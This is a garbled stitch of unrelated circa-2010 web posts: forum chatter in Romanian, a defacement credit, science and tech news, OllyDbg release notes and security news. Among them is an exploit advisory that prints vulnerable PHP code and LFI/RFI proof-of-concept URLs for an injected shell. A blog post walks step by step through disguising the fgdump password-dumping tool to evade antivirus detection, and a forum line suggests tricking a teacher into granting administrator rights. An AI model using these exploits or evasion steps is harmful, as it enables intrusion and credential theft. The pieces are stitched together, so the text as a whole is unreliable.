begood

HcJ | Zone-H.org nod32-antivirus.ro hacked by HcJ Cine-i tipu ?

daca o fentezi pe profa sa te logheze pe administrator poti adauga contului tau drepturi de administrator. asa nu-ti mai bati capul cu absolut nimic pe viitor.

Quantum entanglement, in which paired particles somehow influence each other at apparently instant, faster-than-light speeds, is maybe physic's most bizarre mystery. Now it might be possible to see entangled photons with the naked human eye. Although the very notion of quantum entanglement seems to fly in the face of everything we think we know about physics, the basic concept is simple enough. If two subatomic particles are entangled, then they are linked in such a way that it's impossible to describe one without measuring both. It's as though two particles act like one big particle, even if the two are spatially separated. Since the very act of measuring a particle alters it, this means that measuring one entangled particle automatically affects its partner. This effect has been observed at distances of nearly a hundred miles. One type of particle that physicists often entangle is the photon, the constituent particle of light. Photons are often used in entanglement experiments, where separated pairs are sent through detectors to see how quickly the measurement of one alters the other. In new experiments due to start in the next few months, physicists will simply replace mechanical photon detectors with their natural counterparts: human eyes. Although human eyes are often thought to be rather unimpressive compared to those of other animals, they are actually surprisingly powerful. Human eyes are wired to detect light as little as seven photons wide, and they very rarely detect false positives - photons the eyes think are there but actually aren't. This makes them perfectly decent photon detectors for an entanglement experiment, as long as physicists can entangle bundles of seven or more photons. Right now, the protocols being developed call for considerably more than that, as an initial pair of photons will ultimately be entangled with bundles of about a hundred photons. The photon pulse will then be sent to the eyes of the test subject, with the other half of the entangled pair sent to a regular detector. If all goes according to plan, the human observation of the light will lead to a measurable change in the other set that is then picked up by the detector. Of course, the eyes are no match for these mechanical detectors, but that isn't really the point of these experiments. Rather, those designing the experiments hope to demonstrate that quantum effects are not just some physics freak show, but rather something that tangibly exists in the visible world. That isn't just a public relations achievement; indeed, successfully using eyes will help show that entanglement is a robust enough process that it really can work at a level our eyes can see. [Scientific American] Soon you might be able to see quantum entanglement for yourself

OK Go (those guys from the treadmill video) employed a bunch of engineers from NASA's Jet Propulsion Laboratory to create this delightfully complicated Rube Goldberg machine music video. It's a must-watch. According to NASA Wiki, "More than 40 engineers, techies, artists, and circus types spent several months designing, building, rebuilding, and re-setting a machine that took up two floors of a Los Angeles warehouse." The song is titled "This Too Shall Pass," and even though it's been out for a little bit, we think it's worth noting one more time. //io9

Last update: June 02, 2010 - final release. Here it is. You haven't heard much about OllyDbg 2.0 for a long time. Unfortunately, I am permanently busy and have not much free time. But there is a progress. I have made many changes and bugfixes, among them: - prn bombed me with many, many ideas and found bugs. For example, he reported massive problems with UNICODE filenames that use extended charset. And no, Windows doesn't convert them automatically to ASCII. As OllyDbg is still an ASCII application, now I convert such names to old 8.3 DOS format. Active breakpoint were not marked in the corresponding breakpoint windows; memory breaks were falsely hinted, and so on, and so forth... Thank you, and please don't stop! - William reported bugs with PUSH AH etc. Yes, there are no such commands, but OllyDbg v2.0 happily assembled them. - Keyboard shortcuts did not work in Edit/Search dialog. Reported by mailnew2ster. - Ange gave me the complete list of 80x86 commands as a compiled executable file. He found many assembly/disassembly errors. With his list, we were able to remove them. He also criticided my "English" help file for grammatical errors, silly old me! - Eric, deepzero and karmany reported problems with highlighting and comments. - John found out that Always on top may hide error messages. - Aaron and many other reported crash on structure decoding, namely on those where some elements were unnamed, like elements of array. - I thought that exe/dll with 5 MB code section is really large, until Ivar sent me an executable which code section was 83,079,168 bytes (SEVENTY NINE MEGABYTES) long! Analysis attempted to allocate more than 1,5 GB of memory - still not a problem, but due to fragmentation, my memory manager was unable to execute the request. It was necessary to redesign it. - Rinze pointed at problem with memory breakpoints on stack. OllyDbg did not check memory addressed indirectly by ESP. - NCR asked for the search for process name in Attach window by typing its name. - numax suggested list of user comments. - Hopefully OllyDbg will support Chinese and Japanese fonts in dialog boxes (Edit/Search data), main issue that we tried to debug together with locklose. It should work, but I can give you no warranty. Please check. - And, a couple of days ago, edemko discovered that conditional jums on LOOPZ/LOOPNZ are falsely predicted. This was the last bug corrected in the version 2.00. The list is far from complete, altogether I received more than 100 reports and suggestions. So for all contributors: Without your help, OllyDbg 2.0 would not exist. Thank you very much! And now about my plans for the future. Probably I will convert OllyDbg to UNICODE. There are too many places where ASCII is not fully supported by Windows, like file names with extended charset or controls that don't receive WM_WCHAR. This will mean end for Win95 and WinME users. Those who use WinNT, 2000, XP and Win7 will notice nothing. Of course, plugins will be forced to UNICODE, too. I plan to introduce experimental plugin support in the version 2.01. The interface is not yet defined. If you have written plugins for v1.10, please send me your ideas and suggestions now! Version 2.01 will finally work under 64-bit Windows. Probably I will start developing 64-bit OllyDbg, but this depends on my free time. OllyDbg 2.0

This is a cheat sheet of shortcuts and tips for reverse-engineering malware. It covers the general malware analysis process, as well as useful tips for OllyDbg, IDA Pro, and other tools. Feel free to customize it to your own needs. My reverse-engineering malware course explores these, and other useful techniques. http://zeltser.com/reverse-malware/reverse_engineering_cheat_sheet.pdf Reverse-Engineering Malware Cheat Sheet by Lenny Zeltser

* Link prefetching will probably pop up in Opera, Chrome and Safari soon, and in Internet Explorer sometime around 2020. ahahahahahahahaha !

===========================================================================PHP SETI@home web monitor (phpsetimon) RFI / LFI Vulnerability =========================================================================== Home Page: http://setiathome.ssl.berkeley.edu/ download: http://www.mariovaldez.net/software/phpsetimon/ Author: eidelweiss Contact: g1xsystem[at]windowslive.com ===================================================================== Description: The PHP SETI@home web monitor is a very simple PHP script to monitor single or multiple setiathome programs running in your workstation or server, via the local web server. If you don't know what is SETI@home, visit the SETI@home website. ===================================================================== --=[ Vuln C0de ]=- [-] path/seti.php ----------------------------------------------------------------------------------------- require_once ("seticlients.inc.php"); require_once ("config.inc.php"); $ps_charset = "iso-8859-1"; if ($ps_cfg_language <> "") $ps_htmllang = "<meta http-equiv='Content-Type' content='text/html; charset=$ps_charset'>\n"; $ps_languages = array ("es" => 1, "en" => 1); if (array_key_exists (strtolower ($ps_cfg_language), $ps_languages)) { $ps_cfg_language = strtolower ($ps_cfg_language); require_once ($ps_cfg_langfiles . $ps_cfg_language. ".inc.php"); } else { $ps_cfg_language = "en"; include($ps_cfg_langfiles . "en.inc.php"); } require_once ("seti_lib.inc.php"); require_once ("seti_data.inc.php"); require_once ("seti_graphs.inc.php"); ----------------------------------------------------------------------------------------- -=[ P0C LFI ]=- http://127.0.0.1/path/seti.php?ps_cfg_langfiles= [LFI]%00 -=[ P0C RFI ]=- http://127.0.0.1/path/seti.php?ps_cfg_langfiles= [inj3ct0r sh3ll] =========================| -=[ E0F ]=- |=========================

This document is decided to give readers an outlook on how a penetration test can be successfully done on an organization. A methodology has been drawn out in this document to allow readers to be acquainted with the process that penetration testers go through to conduct a penetration test. http://www.sans.org/reading_room/whitepapers/auditing/conducting-penetration-test-organization_67

Good news for fans of 3D TV and Apple iPads: the porn industry is doing its very best to protect your favourite bits of kit. Despite Steve Jobs' best efforts to keep the iPad porn-free the adult industry is already adapting its content to make it iPad-friendly. Meanwhile in Japan, porn star Mika Kayama is going to do her thing in glorious 3D. That means both the iPad and 3D TV will be massive successes for a very long time. Everybody knows that given the choice between tech that's pristine and pure and tech that likes to get down and dirty, down and dirty always wins. Skin flicks help tech triumph, and formats without them flop. But is that actually true? Not any more. Let's travel back in time to a happier place, where the world was very different from today. Yep, we're talking about 2007. Amid rumours that Blu-ray firms weren't keen on making mucky movies in their pristine plants, the porn industry threw its weight behind HD DVD. One year later, HD DVD was dead. It turns out that what really mattered wasn't the adult industry, but the traditional film industry and the PlayStation 3. And that's because increasingly, porn is something that's viewed in a web browser, not bought on a disc. Because of that, Steve Jobs' anti-porn stance is utterly meaningless. As long as Apple kit ships with a web browser, people will be able to view pornography on it. iPad porn doesn't mean apps; it means nothing more than "we're re-encoding our video clips." It wasn't just the delivery mechanism, though - it was the quality. Pornography has the same "good enough" problem that music has: beyond a certain point, any improvements are incremental. That's why Super Audio CD bombed: most people were perfectly happy with low-bitrate MP3s on rubbish headphones or cheap stereos. With pornography, once the quality's good enough that you can differentiate between People Totally Doing It and a documentary about pigs, a few extra pixels don't make a lot of difference. Then again, 3D doesn't just offer pixels: it offers a whole new dimension. So let's pretend that the market for shiny video discs isn't dying. If the adult industry embraced 3D, would that shift 3D TVs? Would there be enough business to justify the extra cost of producing 3D porn? We doubt it. Whether it's a 3D PC or a 3D TV, adding an extra dimension isn't cheap: you're looking at a brand new TV or monitor and a 3D-capable player or video card. That's a big investment for what we suspect isn't going to be an awfully long viewing experience. Read more: Will 3D porn be the making of 3D TV? | News | TechRadar UK

Two weeks ago the largest BitTorrent tracker on the Internet vanished. The hosting company of the tracker was ordered to take it offline after Hollywood managed to get a court decision in their favor. Today, OpenBitTorrent returns to the web from a new home, managing torrent connections as if nothing happened. In the last year or two the entertainment industries have targeted many BitTorrent sites. The majority of the verdicts against these sites have thus far ruled in favor of the copyright holders. Only in Spain have BitTorrent sites been repeatedly found to operate within the boundaries of the law. Of all the BitTorrent related websites OpenBitTorrent has been one of the most surprising targets. The tracker, which doesn’t link to or host any torrent files and is not linked to any torrent search engine, merely serves as a facilitator of the communication between torrent users, much like BitTorrent clients do. Despite this neutral and apparent non-infringing setup, the Swedish Court of Appeals ruled against the site two weeks ago. In a surprising verdict in a case started by Hollywood movie companies, the Court handed out an injunction to OpenBitTorrent’s hosting provider Portlane, ordering it to cease to provide Internet access to the tracker. The OpenBitTorrent site and tracker returned a few hours ago Following this decision OpenBitTorrent was pulled offline. TorrentFreak contacted the operators of the site who told us that they would be looking for a new hosting provider to bring back their tracker, so it could continue to coordinate the communications between the millions of people that were using it daily. Today, we were informed that OpenBitTorrent has finally found a new hosting company, interestingly enough one that is run by a Spanish company. Just hours after the tracker and its website returned, some 20 million peers spread over 200,000 torrents were already connected to the tracker and business continued as usual. OpenBitTorrent is currently battling for the title of the worlds largest BitTorrent tracker with PublicBitTorrent, another standalone tracker that runs on the Opentracker software. Both trackers handle the communications of between 20 and 30 million BitTorrent users at any given time of the day. Although it’s good to see that OpenBitTorrent has been resurrected, it’s worth nothing that the majority of all BitTorrent users probably never noticed that it had disappeared. Most torrents today come with several backup trackers that are used in case one goes down, and even without trackers at all DHT ensures that downloads continue to work. OpenBitTorrent Tracker Returns After Hollywood Shutdown | TorrentFreak

First of all, I was floored when this worked. Really AV? It’s that easy? Really? So here is the break down, go get “Resource Hacker”… You’re almost done. Only 3 steps left. (1 of which is optional) I started with fgdump, a well known hashdumping/pwdump tool. It’s detected by 80% of all AVs and by all the top 10. You see this on your AV report for your domain controller, and you’re having a bad day, probably week. Watch this magic trick though: [*] Step 1: Open Res Hacker and drag a “normal” executable on to the window or Open File. Click “Save All Resources” Essentially what you are doing in this step is simply extracting the .ico file (Icon) from the executable. Now you can do this with other tools, but we’ll be using resource hacker in a minute again, so it’s just easy to do it all with one tool. We are done with this executable unless you are doing Step 2, in that case, leave it open, open another Res Hacker window and open your ‘evil’. (In our case, fgdump.exe) [*] Step 2 (Optional): If you destination executable has tell-tale signs of it’s intent, much like fgdump as seen below: You can simply copy and paste the version info from your ‘normal’ executable into your new one and hit “Compile Script”: [*] Step 3: Next we need to “Add a new Resource” (our icon) into our “evil” binary. Once this prompt comes up, select the ICO file that shows the icon you want it to have (some binaries have a ton, so make sure it’s the right one). Put in ‘1’ for resource name, and ‘1033’ for your resource language. (You can play with these values, not sure what impact they have, but from the binaries I’ve looked at those values are pretty standard for a windows executable). Save your new awesome binary as something else, I chose vlc2.exe And… (drum roll) Tada! Sad isn’t it? Only 1 of the top 10 AV now detect this binary. Good job AVG and Avast! You still picked it up, but Trend, Symantec, Microsoft, ClamAV, Kaspersky, Panda, Norman, NOD32, Sunbelt, F-Secure, Fortinet, BitDefender WTF guys!? Oh and Kaspersky now flags it as “not-a-virus” but still flags it. Room362.com - Blog - AV bypass madestupid

One of the lesser-known jewels of HTML 5 is link prefetching. The idea is to extend the time-honored concept of image preloading to HTML content (and without any messy AJAX code). Here’s how it works: You add a line like this to your page: <link rel="next" href="page2.html"> Then the browser automatically downloads page2.html in a background process as soon as the user’s computer is idle. When the user finally clicks a link to page2.html, the browser serves it from the cache, and so it loads significantly faster. Link prefetching is currently only supported by Firefox. But since Firefox is the second most popular web browser in the world, you can noticeably decrease load times for a significant chunk of your users just by adding one line of code to your HTML. Pretty cool, huh? Here are some ways you could use link prefetching: * Anytime you split content across multiple pages, as in large articles, online tutorials, image slideshows, etc. * On your homepage to preload whatever page your users tend to click on next. (That could be the “features” page on a product site or your most recent entry on a blog.) * On a search engine to prefetch the top result. You can also use it for static content using the prefetch rel: <link rel="prefetch" href="/images/big.jpeg"> A couple other interesting points: * Link prefetching will probably pop up in Opera, Chrome and Safari soon, and in Internet Explorer sometime around 2020. * If this becomes popular it has the potential to skew logs and stats. Consider what happens when a bunch of prefetch requests are made to one of your pages, but the user never actually visits the page. The server (or stats package) doesn’t know the difference. To clear this up, Firefox sends along an HTTP header, X-moz: prefetch, but you need some logic on the server side to detect it. To learn more about link prefetching and see other examples, see the article about it on Mozilla’s site: https://developer.mozilla.org/en/link_prefetching_faq http://keyboardy.com/programming/html5-link-prefetching/

overview Contempt is a framework for designing visual representations of data obtained in a penetration test. Contempt is implemented using the Eclipse Rich Client Platform. A seed is an extensible framework for resource management. It runs as a daemon on a system, and accepts commands from the contempt UI. Seeds can then act as "agents", able to manipulate various resources on remote hosts. Data gathered is collected in a lightweight database, which is managed by the contempt UI. current 0.6.0 is going through some final testing screenshots new features in 0.6.0 Revamped key management system Easily manage users on remote seeds Added a nice webstart based installer Added collaborative network scanning seedsofcontempt - Project Hosting on Google Code

pai zi frate ce stii sa faci, nu ca salut salut in ce lucrezi? programator IT, wow, sunt pe spate.

According to a post from Brandon LeBlanc, who is responsible for Microsoft's official Windows team blog, there is some irony that's "hard to overlook" in Google's getting rid of Windows. For instance, the renowned Yale University has apparently halted their move to Google Mail and Google Apps, citing security and privacy concerns. LeBlanc says the security of Windows isn't all that bad. According to his post, even hackers admit that Microsoft are doing a better job making their products more secure than anyone else. Security specialist Intego says that Apple Mac OS X is not by any means a malware free option. Intego warns that popular software portals such as Softpedia, MacUpdate and VersionTracker offer applications and screen savers for Mac OS X which infect computers with spyware. Intego say that while downloaded applications don't contain the malware itself, they retrieve the OSX/OpinionSpy spyware once they have been installed. Among other things, OpinionSpy opens a back door to collect data about the user's installed files, access credentials, credit card details and online behaviour and sends this information to a server on the internet. The Financial Times reported that Google's decision to phase out the Windows operating system on a corporate level was based on security concerns and the larger amount of malware in active circulation for this operating system. According to the paper, Google accelerated the implementation of its directive to move to Mac OS X and Linux after being hacked by intruders who were presumed to be Chinese. The hack provided even further potential for irony: The attackers exploited a hole in Internet Explorer 6 to compromise a Google computer. However, the more secure versions 7 and 8 of Microsoft's browser were already available at the time. Experts have since puzzled over why Google's employees were using an obsolete version. Microsoft themselves have now decided to phase out Internet Explorer 6. Microsoft comments on Google's Windows ban - The H Security: News and Features

Originally expected for today, Mozilla has confirmed that it is delaying the the release of version 3.6.4 of its open source Firefox web browser, the next security and stability update to the 3.6.x branch of Firefox. Instead, Mozilla has announced the availability of a release candidate for public testing. The Firefox 3.6.4 release candidate addresses several bugs found in the previous beta. The 3.6.4 update includes, for example, technology from the Mozilla Lorentz Project. Lorentz is designed to bring full process isolation to Firefox, separating web pages and plug-ins from the main browser by running them in their own processes. When a web page or plug-in crashes, with process isolation, the rest of the browser is unaffected by the failure, resulting in a more reliable browser. The developers note that, should no issues be found during testing of the RC, it will officially be released as Firefox 3.6.4. However, a final release date for Firefox 3.6.4 has yet to be confirmed. As with all development releases, use in production environments and on mission critical systems is not advised. Users testing the release are encouraged to provide feedback and report any bugs that they encounter. More details about the development preview, including a list of known issues, can be found in the Mozilla Developer Center news announcement and in the release notes. The Firefox 3.6.4 release candidate is available to download for Windows, Mac OS X and Linux from the project's web site. Firefox binaries are released under the Mozilla Firefox End-User Software License Agreement and the source code is released under disjunctive tri-licensing that includes the Mozilla Public Licence, GPLv2 and LGPLv2.1.The latest stable release of Firefox is version 3.6.3 from the beginning of April. Mozilla delays Firefox 3.6.4 - The H Security: News and Features

Ruby on Rails is used in metasploit and many other open source security and hacking tools. Thus as a security professional or as a hacker, we need to know how to work with this language. Also, we hacker's generally prefer to pick up things in a fast track. This video series is just that - Ruby on Rails 1-day course from UC Berkeley. All the presentations and other material can be downloaded here. http://securitytube.net/A-Hacker%27s-Guide-to-Ruby-on-Rails-video.aspx

nu-mi place de logo, dar merge ca wallpaper. fa-l de wallpaper [1152x864]

begood zice ban.

How to find vulnerabilities, write shellcode, exploit the vulnerability and finally turn it into a Metasploit exploit module! David Hoelzer is a Senior Fellow with the SANS Institute and author of the SANS Secure Coding in C/C++ course. He also regularly teaches incident handling, forensics and IT Audit courses for SANS: SANS: Auditing Networks, Perimeters, and Systems For the source code used in this demonstration, go here: http://www.enclaveforensics.com/Blog/files/e6fb7327cb615688f90fc07656a3880d-28.html

Man-made DNA has booted up a cell for the first time. In a feat that is the culmination of two and a half years of tests and adjustments, researchers at the J. Craig Venter Institute inserted artificial genetic material — chemically printed, synthesized and assembled — into cells that were then able to grow naturally. “We all had a very good feeling that it was going to work this time,” said Venter Institute synthetic biologist Daniel Gibson, co-author of the study published May 20 in Science. “But we were cautiously optimistic because we had so many letdowns following the previous experiments.” On a Friday in March, scientists inserted over 1 million base pairs of synthetic DNA into Mycoplasma capricolum cells before leaving for the weekend. When they returned on Monday, their cells had bloomed into colonies. “When we look at life forms, we see fixed entities,” said J. Craig Venter, president of the Institute, in a recent podcast. “But this shows in fact how dynamic they are. They change from second to second. And that life is basically the result of an information process. Our genetic code is our software.” Coaxing the software to power a cell proved harder than expected. After the Venter Institute announced in early 2008 that it had assembled a synthetic Mycoplasma genitalium genome, the assumption was that it would be running cells in no time. But this particular cell type, despite its minimal size, was not an ideal research partner. One problem was speed. “We had to deal with the fact that M. genitalium had an extremely slow growth rate,” Gibson said. “For every experiment that was done, it took more than a month to get results.” Moreover, transplanting the code into recipient cells was failing. So researchers cut their losses and called in a substitute, opting for the larger, speedier and less finicky Mycoplasma mycoides. The choice was a good one. “Over the last five years the field has seen a 100-fold increase in the length of genetic material wholly constructed from raw chemicals,” said synthetic biologist Drew Endy of Stanford University. “This is over six doublings in the max length of a genome that can be constructed.” Plunging costs of synthesis allowed a leap past the 1 million base-pair mark, from code to assembly. “Imagine doubling the diameter of a silicon wafer that can be manufactured that much, going from 1 cm to 1 meter [fabrications] in just five years,” Endy said. “That would have been an incredible achievement.” “They rebuilt a natural sequence and they put in some poetry,” said University of California at San Francisco synthetic biologist Chris Voigt. “They recreated some quotes in the genome sequence as watermarks.” It’s an impressive trick, no doubt, but replicating a natural genome with a little panache is also the limit of our present design capabilities. Researchers, for instance, figure yeast can handle the assembly of 2 million base pairs, but they’re not sure about more. And an energy-producing cyanobacteria that sequesters carbon, Gibson says, is still several years off. The ultimate goal, of course, is a brand-new genome from the ground up. Now, Voigt said, “what do you do with all that design capacity?” Read More Scientists Create First Self-Replicating Synthetic Life | Wired Science | Wired.com

Seismic waves traveling between Earth’s poles move faster than those moving east-west, and now scientists think they may know why. The iron alloys in the solid inner core of the Earth appear to have crystallized in such a way that it’s easier for energy to pass on the north-south axis than on the east-west, as described in a new study led by Maurizio Mattesini, a geologist at the Universidad Complutense de Madrid, which appeared in the journal Proceedings of the National Academy of Sciences. “The structure of the atoms looks different in one direction than the other,” explained Norm Sleep, a Stanford geologist who was not part of the new study, In the textbooks of yore, the Earth’s inner regions like the mantle and core were presented as simple, fairly homogeneous regions. But the geology of the core is turning out to be much more complex as scientists make use of more and better seismographs to generate better data about how seismic waves travel through the planet. The outer core is composed mostly of liquid iron. The inner core is solid ball about 750 miles in diameter, or a little less than the maximum width of the state of Texas, which formed as the Earth cooled over geologic time, said David Stephenson, a geologist at CalTech. “The center of the earth is literally a crystal,” said Stephenson. Over time, it grew and now is no longer a single crystal but an aggregate of them. In the mid-1990s, geologists began to notice an interesting thing. Seismic waves traveling north-south were reaching their destinations about 3 percent faster than waves moving along east-west paths. “It’s one of these things that’s been detected for some time but kind of why it occurs has been somewhat of a puzzle,” Sleep said. They didn’t know why, but then again, the middle of the globe is perhaps the most difficult place to gather data on Earth. The new paper suggests that as the crystals formed, they received a particular alignment. That alignment, known as anisotropy, makes it easier for waves to travel in one direction than the other. The most significant thing about the new paper, Stephenson said, is that the researchers were able to match up the results that seismologists have been getting on the speed of seismic waves through the core with new laboratory tests with particular kinds of iron crystals. Read More The Crystals at the Center of the Earth | Wired Science | Wired.com

One isn’t such a lonely number. All life on Earth shares a single common ancestor, a new statistical analysis confirms. The idea that life forms share a common ancestor is “a central pillar of evolutionary theory,” says Douglas Theobald, a biochemist at Brandeis University in Waltham, Massachusetts. “But recently there has been some mumbling, especially from microbiologists, that it may not be so cut-and-dried.” Because microorganisms of different species often swap genes, some scientists have proposed that multiple primordial life forms could have tossed their genetic material into life’s mix, creating a web, rather than a tree of life. To determine which hypothesis is more likely correct, Theobald put various evolutionary ancestry models through rigorous statistical tests. The results, published in the May 13 Nature, come down overwhelmingly on the side of a single ancestor. A universal common ancestor is at least 102,860 times more probable than having multiple ancestors, Theobald calculates. No one has previously put this aspect of evolution through such a stringent test, says David Penny, a theoretical biologist and Allan Wilson Centre researcher at Massey University in Palmerston North, New Zealand. “In one sense, we are not surprised at the answer, but we are very pleased that the unity of life passed a formal test,” he says. He and Mike Steel of the University of Canterbury in Christchurch, New Zealand, wrote a commentary on the study that appears in the same issue of Nature. For his analysis, Theobald selected 23 proteins that are found across the taxonomic spectrum but have structures that differ from one species to another. He looked at those proteins in 12 species — four each from the bacterial, archaeal and eukaryotic domains of life. Then he performed computer simulations to evaluate how likely various evolutionary scenarios were to produce the observed array of proteins. Theobald found that scenarios featuring a universal common ancestor won hands down against even the best-performing multi-ancestor models. “The universal common ancestor (models) didn’t just explain the data better, they were also the simplest, so they won on both counts,” Theobald says. A model that had a single common ancestor and allowed for some gene- swapping among species was even better than a simple tree of life. Such a scenario is 103,489 times more probable than the best multi-ancestor model, Theobald found. Theobald’s study does not address how many times life may have arisen on Earth. Life could have originated many times, but the study suggests that only one of those primordial events yielded the array of organisms living today. “It doesn’t tell you where the deep ancestor was,” Penny says. “But what it does say is that there was one common ancestor among all those little beasties.” Read More Life on Earth Arose Just Once | Wired Science | Wired.com

LIMASSOL, CYPRUS--The scareware and rogue anti-virus epidemic that has been earning attackers millions of dollars for the last few years has spawned a devious new offspring: SMS blockers. This class of malware, which demands that users send SMS text messages to premium numbers, has recently taken off in huge numbers in Russia and parts of Asia, experts say. SMS blockers, or simply blockers, as they're known, are a clever evolution of the old ransomware or scareware tactic of demanding a payment in exchange for either removing some malware on a PC or decrypting the user's hard drive, which the ransomware encrypted in the first place. These tactics have been extremely profitable for scammers in the last four or five years, earning some gangs millions of dollars per year. In recent months there has been a major uptick in the volume of SMS blockers hitting users in Eastern Europe--particularly Russia--and parts of Asia. The scam is as simple as it is effective: A victim visits a malicious site, or perhaps a legitimate site that has been compromised and loaded with attack code, and her machine is infected with a piece of malware. The victim will then start seeing dialog boxes with a message demanding payment in order to disinfect the machine. But, in order to disinfect the PC, the victim must send an SMS message from her mobile phone to a premium number controlled by the attacker, typically at a cost of about $10, said Boris Yampolsky, a malware researcher at Kaspersky Lab, in a talk at the company's Security Analyst Summit here Wednesday. In some variations of the scam, victims see a pornographic picture in a pop-up window, which is impossible to remove until the SMS message is sent. Some of the scams also require victims to send two separate messages, totaling $20. Other variations tell the victim that her Windows license is invalid and she must send an SMS to re-activate it. In all cases, the machine essentially becomes unusable until the payment is made. The new scam relies on an ecosystem of entities behind the scenes in order to work. In a typical set-up, the scamme buys a short SMS number from an aggregator, who in turn has purchased the number from a mobile operator. Once a victim is infected, the SMS that she is instructed to send will typically contain a code that essentially identifies the scammer who infected her. The mobile operator pays the aggregator his fee, half of which is then forwarded to the scammer. Yampolsky, who has been tracking these scams in Russia, estimates that there are as many as 500,000 SMS blocker infections each day. "The code is sophisticated. They use obfuscation and anti-emulation techniques to make it hard for us to analyze it," he said. SMS blockers haven't made much of a dent in the United States and other Western countries as yet, Yampolsky said, because it's more difficult for scammers to get the SMS numbers required for the attack. But that may change in the future as they figure out ways around the restrictions in the U.S. SMS Blockers: The New Face of Ransomware | threatpost